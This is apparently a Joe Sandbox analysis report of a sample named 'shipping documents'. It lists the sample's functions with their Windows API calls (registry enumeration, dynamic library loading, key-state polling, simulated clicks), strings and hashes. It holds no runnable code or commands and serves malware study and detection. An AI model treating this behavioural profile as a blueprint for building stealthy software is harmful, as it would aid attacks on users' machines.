Instruction ID: 5549e53b0a403e44fde9af3ac14b5c272c360e9f0e8e7e3cdc7e9cc0fa8bc5ba
Opcode Fuzzy Hash: 3a2c0e09262303785e10c2a92157e767813ca929f6ead1a3fac0bd20bbbad3b8
Instruction Fuzzy Hash: 632151F4504209ABDB20AF78DC05ADA77AAAF94720F20461AFCA1D73D0D77099918B60

Function 006B710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 006B712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006B715D
GetStdHandle.KERNEL32(000000F6), ref: 006B716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006B71A8

Strings

nul, xrefs: 006B71A3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 6ae4eab37013eebdbcf3933802e65f0e517d660d3e98db7c855c6678fc503c55
Instruction ID: 041bc71ba6697ee893eef513d06e0d458ae0be9c9145e7b2fc7506aa4239474f
Opcode Fuzzy Hash: 6ae4eab37013eebdbcf3933802e65f0e517d660d3e98db7c855c6678fc503c55
Instruction Fuzzy Hash: 942171B5904205ABDB209F6CDC04AEAB7EAAF95720F240619FDA1D73D0D77099818B64

Function 006BAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006BAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006BAF13
__swprintf.LIBCMT ref: 006BAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,006DF910), ref: 006BAF6A

Strings

%lu, xrefs: 006BAF26

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 86006bffdec165cf6f887488ea9e3b384c35c3e2a8b7ef0dea452ddc5d848311
Instruction ID: 4d8facc292ba64fefb1af3df1414f8ae06c2c92f2dd4eac52a0ebad293924360
Opcode Fuzzy Hash: 86006bffdec165cf6f887488ea9e3b384c35c3e2a8b7ef0dea452ddc5d848311
Instruction Fuzzy Hash: CE217F74A00209AFCB50EFA4CD85DEE7BB9EF89704B144069F909EB351DB31EA45CB21

Function 006AA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

Part of subcall function 006AA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006AA399
Part of subcall function 006AA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006AA3AC
Part of subcall function 006AA37C: GetCurrentThreadId.KERNEL32 ref: 006AA3B3
Part of subcall function 006AA37C: AttachThreadInput.USER32(00000000), ref: 006AA3BA

GetFocus.USER32 ref: 006AA554

Part of subcall function 006AA3C5: GetParent.USER32(?), ref: 006AA3D3

GetClassNameW.USER32(?,?,00000100), ref: 006AA59D
EnumChildWindows.USER32(?,006AA615), ref: 006AA5C5
__swprintf.LIBCMT ref: 006AA5DF

Strings

%s%d, xrefs: 006AA5D9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 82744f82bd9ba3d5417a81994fa7b5bfc15e9e4beba3e4a99e2cc83e62a61e39
Instruction ID: 8e2012bf4e62817adf9a4f2fbfda1a32af415f9f7f3120948a948cf79f4264df
Opcode Fuzzy Hash: 82744f82bd9ba3d5417a81994fa7b5bfc15e9e4beba3e4a99e2cc83e62a61e39
Instruction Fuzzy Hash: B311A271600208ABDF51BFA0EC85FEA777A9F49701F04807ABD09AA152CB705D45CF79

Function 006B2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006B2048

Strings

APPEND, xrefs: 006B2081
KEYS, xrefs: 006B205F
REMOVE, xrefs: 006B204E
EXISTS, xrefs: 006B2070

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 356722f5d3992e465db0780cfb6269a8522f06c0ec9ee071452479fffee84494
Instruction ID: adfcf5abc583b616955b384aeccfbdc3695855e6ca53871e0494edda0af3066b
Opcode Fuzzy Hash: 356722f5d3992e465db0780cfb6269a8522f06c0ec9ee071452479fffee84494
Instruction Fuzzy Hash: 4A115B7091020ADFCF50EFA8D8514EEB7F6FF19304F108969D856A7392EB32691ACB50

Function 006CEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006CEF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 006CEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006CF07E
CloseHandle.KERNEL32(?), ref: 006CF0FF

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: dd571c5a980cce67ce5cb69b3059768aff0deb81109cda54aeda1eb23862ccc7
Instruction ID: 1363bc7dd075f5e9bd957980487ec1b7da84caaeb84b949126281442f21c0bd3
Opcode Fuzzy Hash: dd571c5a980cce67ce5cb69b3059768aff0deb81109cda54aeda1eb23862ccc7
Instruction Fuzzy Hash: A2815E716043009FD760DF28CC46F6AB7E6EF48B10F14881DF9969B392DB71AC458B95

Function 006D02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 006D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006D0038,?,?), ref: 006D10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006D040E
RegCloseKey.ADVAPI32(?,?), ref: 006D043A
RegCloseKey.ADVAPI32(00000000), ref: 006D0447

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: bbc5e32ce15fa95cd6ef581c8ebfc1783b375b24c60c7f58ca48e8b4361c7465
Instruction ID: 5dd4b40909f7a642bac84102979d4710ac6e62fe1d08e451d9551a44472ab0df
Opcode Fuzzy Hash: bbc5e32ce15fa95cd6ef581c8ebfc1783b375b24c60c7f58ca48e8b4361c7465
Instruction Fuzzy Hash: 6D514A31608205EFD744EF64D891F6EB7EAFF88304F04892EB59687291DB70E909CB56

Function 006CDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 006CDC3B
GetProcAddress.KERNEL32(00000000,?), ref: 006CDCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 006CDCDA
GetProcAddress.KERNEL32(00000000,?), ref: 006CDD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 006CDD35

Part of subcall function 00655B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7B20,?,?,00000000), ref: 00655B8C
Part of subcall function 00655B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7B20,?,?,00000000,?,?), ref: 00655BB0

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 3d7c30b3eda271401bed5ec97026cd6c3be1b76d34b5efe106e6930ed2f760e3
Instruction ID: eb17e7711047f86ef0e8802cdcfe33efed931422850f5c2a60ed82986ec74c8f
Opcode Fuzzy Hash: 3d7c30b3eda271401bed5ec97026cd6c3be1b76d34b5efe106e6930ed2f760e3
Instruction Fuzzy Hash: C2511875A00209DFCB00EF68C894DADB7F6FF58314B19806AE816AB311DB30AD49CF95

Function 006BE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006BE88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006BE8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006BE8F2

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006BE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006BE91F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 4013092294ff7168065c79739a6bf6d601c1775df05b4554638f33455aa328a0
Instruction ID: faa5330b59a72f193d59247536ca5e3874483f0f263fb6629716e8015d2a8aeb
Opcode Fuzzy Hash: 4013092294ff7168065c79739a6bf6d601c1775df05b4554638f33455aa328a0
Instruction Fuzzy Hash: F9513035A00209DFCF41EF64C9819ADBBF6EF08311F188099E80AAB361DB31ED55CB64

Function 006DA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939d6b3752ed94dbdb2baaddc2f4c714ce5cea9e55d174dd73946b12a3866d33
Instruction ID: a0aeaa32d4e5af42ab191f4f085a4483c5ba3ef89f641810768363a4291160e2
Opcode Fuzzy Hash: 939d6b3752ed94dbdb2baaddc2f4c714ce5cea9e55d174dd73946b12a3866d33
Instruction Fuzzy Hash: 8841D235D09104AFC720DFA8CC48BE9BBA7EB09310F164266E856E73E1D770AE41DA51

Function 00652344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00652357
ScreenToClient.USER32(007167B0,?), ref: 00652374
GetAsyncKeyState.USER32(00000001), ref: 00652399
GetAsyncKeyState.USER32(00000002), ref: 006523A7

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 31fee62aff19ee61a0fdf414b5ce2c4944c63fc2558bb364c1e22228d71534da
Instruction ID: d46554374bfd73bee4e02810039a282a00efc723d4cf081d25cb3625c6d8872e
Opcode Fuzzy Hash: 31fee62aff19ee61a0fdf414b5ce2c4944c63fc2558bb364c1e22228d71534da
Instruction Fuzzy Hash: 7F418F3190411AFBDF159F68C854AE9BB76FB46321F20436AF82992290C7349E58DFA1

Function 006A6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A695D
TranslateAcceleratorW.USER32(?,?,?), ref: 006A69A9
TranslateMessage.USER32(?), ref: 006A69D2
DispatchMessageW.USER32(?), ref: 006A69DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A69EB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 910050750789f1398234aa3c165fdcf3b1505438f0e5936b9b27a36691299240
Instruction ID: 45a5d26b7ffb9cc56856c4154f8ad4943f0263ed00ef0a59c3e52bd9b84767f5
Opcode Fuzzy Hash: 910050750789f1398234aa3c165fdcf3b1505438f0e5936b9b27a36691299240
Instruction Fuzzy Hash: 4D31B271900247AADB60AF78DC49BF77BAEAB03304F18C169F522D22A1D674DC85DF90

Function 006A8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006A8F12
PostMessageW.USER32(?,00000201,00000001), ref: 006A8FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006A8FC4
PostMessageW.USER32(?,00000202,00000000), ref: 006A8FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006A8FDA

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 7c4966b7f5195afc720d70ef848ae333ff4fb1518e9f51deca35ab0721fd255d
Instruction ID: aeb7afed6924d8e9f4e209dba2ce25b5af78bee41521554e99ab8297bc3cbb1f
Opcode Fuzzy Hash: 7c4966b7f5195afc720d70ef848ae333ff4fb1518e9f51deca35ab0721fd255d
Instruction Fuzzy Hash: 9531AB7190021AEFDB14DF68D94CADE7BB6EB46315F10422AF925AB2D0CBB09D14DF90

Function 006AB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 006AB6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006AB6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006AB71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006AB742
_wcsstr.LIBCMT ref: 006AB74C

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: a240c3596801f322a89a382cfb32800809909ddd685c4a44adf47b82f35a43ed
Instruction ID: 8d738eab5ae046ce3736ddfba4fc4158d98fa2384fd25ccf2094e2cf15dc71b1
Opcode Fuzzy Hash: a240c3596801f322a89a382cfb32800809909ddd685c4a44adf47b82f35a43ed
Instruction Fuzzy Hash: 2221FC31605244BBEB156B399C49E7B7B9EDF46710F10903EFC09CA2A2EFA1DC419B60

Function 006DB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

GetWindowLongW.USER32(?,000000F0), ref: 006DB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 006DB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006DB489
GetSystemMetrics.USER32(00000004), ref: 006DB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006C1184,00000000), ref: 006DB4D0

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: d8fa7e09d2f58e551b0558fe629612ac9c6515829e3f72af9c39a96a9992b655
Instruction ID: 0866a41b6aec382c8984a23ee390c38c02b77dfef61b1426251045c9523a8005
Opcode Fuzzy Hash: d8fa7e09d2f58e551b0558fe629612ac9c6515829e3f72af9c39a96a9992b655
Instruction Fuzzy Hash: 3C219471D10255EFCB10CF389C04AA937E6EB05720F16973AF926C23E9E7309811DB80

Function 006A97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A9802

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006A9834
__itow.LIBCMT ref: 006A984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006A9874
__itow.LIBCMT ref: 006A9885

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 05b5451e22b4caa58101dd2cb0b11691496287c225c551b19afe34bc33e7c8e9
Instruction ID: 8437808523ad4daa0be60e2a695fdd4b47c9b816d632d499f2874fd7434fc911
Opcode Fuzzy Hash: 05b5451e22b4caa58101dd2cb0b11691496287c225c551b19afe34bc33e7c8e9
Instruction Fuzzy Hash: 4021F831B01208ABDB10AB659C86EEE7BBBDF4B710F144029FD05DB281D6748D459BA1

Function 006512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0065134D
SelectObject.GDI32(?,00000000), ref: 0065135C
BeginPath.GDI32(?), ref: 00651373
SelectObject.GDI32(?,00000000), ref: 0065139C

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 417c6d044c94026f37761d688a1ca57207f15749d39f8a3763a5c92d3993f25e
Instruction ID: 55dd0ff01476fb422af1345d22c9c35d39d3a045dd1c69007909be11b37ce9d6
Opcode Fuzzy Hash: 417c6d044c94026f37761d688a1ca57207f15749d39f8a3763a5c92d3993f25e
Instruction Fuzzy Hash: 70214C70C01208EFDB119F2DDC187E97BBAFB01322F14C226F8119A6E0D775999ADB94

Function 006AC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 006AC176
_memcmp.LIBCMT ref: 006AC194
_memcmp.LIBCMT ref: 006AC1A7
_memcmp.LIBCMT ref: 006AC1BF
_memcmp.LIBCMT ref: 006AC1D7

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
